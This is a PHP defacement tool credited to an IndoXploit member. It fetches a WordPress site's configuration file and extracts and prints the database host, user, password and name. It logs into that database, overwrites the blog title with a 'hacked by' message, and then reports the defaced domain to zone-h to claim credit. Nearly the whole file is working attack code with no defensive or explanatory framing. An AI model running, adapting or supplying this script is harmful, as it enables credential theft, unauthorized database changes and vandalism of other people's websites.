link_title_2.php

1. <?php
2. // Tu5b0l3d -IndoXploit-
3. // link_index.php
4.  
5. error_reporting(0);
6.     if($_POST){
7.  
8.         function ambilKata($param, $kata1, $kata2){
9.     if(strpos($param, $kata1) === FALSE) return FALSE;
10.     if(strpos($param, $kata2) === FALSE) return FALSE;
11.     $start = strpos($param, $kata1) + strlen($kata1);
12.     $end = strpos($param, $kata2, $start);
13.     $return = substr($param, $start, $end - $start);
14.     return $return;
15. }
16.  
17.     function anucurl($sites){
18.         $ch1 = curl_init ("$sites");
19. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
20. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
21. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
22. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
23. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
24. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
25. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
26. $data = curl_exec ($ch1);
27. return $data;
28.     }
29.  
30.  
31.         $link = $_POST['link'];
32.         $script = $_POST['script'];
33.         $zh = $_POST['nick'];
34.         if($script==""){
35.             echo "Isi Dulu Hacked By \$script\n\n";
36.         }
37.         else{
38.         $file = anucurl($link);
39.  
40.         $host = ambilkata($file,"DB_HOST', '","'");
41.                     $username = ambilkata($file,"DB_USER', '","'");
42.                     $password = ambilkata($file,"DB_PASSWORD', '","'");
43.                     $db = ambilkata($file,"DB_NAME', '","'");
44.                     $dbprefix = ambilkata($file,"table_prefix  = '","'");
45.                     $sue = $db.".".$dbprefix."options";
46.                    
47.  
48.  
49.                     echo "# Db Host: $host\n";
50.                     echo "# Db user: $username\n";
51.                     echo "# Db Password: $password\n";
52.                     echo "# Db name: $db\n";
53.                     echo "# Table_Prefix: $dbprefix\n";    
54.  
55.         mysql_connect($host,$username,$password);
56.         mysql_select_db($db);
57.  
58.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
59.         $r2=mysql_fetch_array($tampil2);
60.         $target = $r2[option_value];
61.          echo "# $target\n";
62.        
63.          mysql_query("UPDATE $sue SET option_value='$script' WHERE option_name='blogname'");
64.  
65. $bs = anucurl($target);
66.  
67.  if(preg_match("#hacked#si",$bs)){
68.                         echo "-> berhasil mepes...\n";
69.                      
70.                         echo "-> zone-h: ";
71.                     $ch3 = curl_init ("http://www.zone-h.com/notify/single");
72.                         curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
73.                         curl_setopt ($ch3, CURLOPT_POST, 1);
74.                         curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$target&hackmode=1&reason=1&submit=Send");  // here put ur name on zone-h
75.                        
76.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
77.                 echo  " Ok \n\n";
78.         }else{
79.                 echo " No\n\n";
80.                        
81.                     }
82.                
83.  
84.                        
85.                     }
86.              
87.            
88.                
89.                
90. }
91.     }else{
92.             echo 'Tu5b0l3d -IndoXPloit-';
93.         }
94.          
95.  
96. ?>